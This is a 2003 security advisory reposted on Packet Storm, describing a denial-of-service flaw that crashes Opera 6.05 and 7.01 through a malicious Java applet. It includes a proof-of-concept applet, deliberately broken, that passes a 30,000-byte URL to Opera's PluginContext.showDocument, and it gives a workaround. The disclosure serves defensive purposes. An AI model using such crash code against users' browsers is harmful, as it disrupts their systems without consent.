what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

beauchamp02032003.txt

beauchamp02032003.txt
Posted Feb 11, 2003
Authored by Marc Schoenefeld | Site illegalaccess.org

A specially constructed Java Applet crashes Opera versions 6.05 and 7.01. Opera's own class files in the opera.jar library are susceptible to a buffer overrun which causes a JVM crash and then crashes Opera.

tags | exploit, java, overflow
SHA-256 | 348fa9d0eb2e4f65de49b13f851cd88cba36942bf730efaae4b722eecbce6fa8

beauchamp02032003.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Security Advisory
Beauchamp Security: Java-Applet crashes Opera 6.05 and 7.01

Applet crashes Opera 6.05 and 7.01
===================================================
Vendor: Opera
Versions affected: Opera 6.05 / 7.01
Date: 3rd February 2003
Type of Vulnerability: Client DoS
Severity: High
Discovered by: Marc Schoenefeld, marc@beauchamp.de
Online location: http://www.illegalaccess.org/java/OperaCall2.html
===================================================

Analyzing the public interfaces of the opera java class libraries, a special
applet could be constructed that provokes a JNI call with an invalid
parameter right into a vulnerable routine causing a Denial of Service!

Discovery date
3 Feb 2003.

Affected applications
Opera 6.05
Opera 7.01
Vendor Response
This is what is rather unnice, the Opera team does not respond to bug
reports, and neither read their own forum entries, to which the bug was also
posted

Solution
Until a patch becomes available, disable Java by going to: File ->
Preferences -> Multimedia, and uncheck the "Enable Java" item.

Analysis
Opera has its own class files in the opera.jar library. These are considered
trusted by the system policies. But they are also vulnerable against invalid
user input. In the proof-of-concept shown below the following showDocument
method of the PluginContext object is called with a URL object carrying a
very long string. Executing this method, causes the call of a native method,
which cannot handle the value and therefore raises a JVM crash, which then
crashes Opera 7.01. This was observed on Windows XP and Opera 6.05/7.01 with
Java enabled, directly calling the applet after installation.


//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are couple of obvious syntax errors
to avoid script-kidding

...
import opera.PluginContext; // !! import the vulnerable class
...

public class OperaCall2 extends App1et
{
- -
- - public OperaCall2()
- - {
- - }
- -
- - public void paint(Graphics g)
- - {
- - PluginContext plugincontext = new PluginContext(l);
- - try
- - {
- - plugincontext.showDocument(new URL("http://xxx.xxx" + new
String(new byte[30000])));
- - }
- - catch(Exception exception)
- - {
- - exception.printStackTrace();
- - }
- - }
}


Disclaimer
The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind. Beauchamp Security is not liable for
any direct or indirect damages caused as a result of using the information
or demonstrations provided in any part of this advisory.

P.S. The following link should of course, be viewed with Opera which then
will be crashed, it does no harm to Amaya,IE, Mozilla, Netscape, Phoenix ,
Lynx, emacs or wget -O - .


- --------------------------------------------------------------------------------


Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE+R+oCqCaQvrKNUNQRAtwgAJ9i6rooK7ejcWlp5nq4OqE7SVOK1gCfc49L
5FtTghOTeQSssTVF55yVmho=
=k2CK
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close